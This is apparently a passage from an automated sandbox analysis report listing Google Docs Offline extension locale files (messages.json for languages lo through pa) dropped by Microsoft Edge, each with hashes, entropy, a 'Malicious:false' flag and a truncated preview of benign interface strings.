                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2535
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                                                  MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                                                  SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                                                  SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                                                  SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1028
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                                                  MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                                                  SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                                                  SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                                                  SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):994
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                  MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                  SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                  SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                  SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2091
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                  MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                  SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                  SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                  SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2778
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                  MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                  SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                  SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                  SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1719
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                  MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                  SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                  SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                  SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                  MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                  SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                  SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                  SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):3830
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                  MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                  SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                  SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                  SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1898
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                  MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                  SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                  SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                  SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):914
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                  MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                  SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                  SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                  SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):878
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                  MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                  SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                  SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                  SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir5668_1639322818\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2766
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                  MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                  SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                  SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                  SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                  Malicious:false
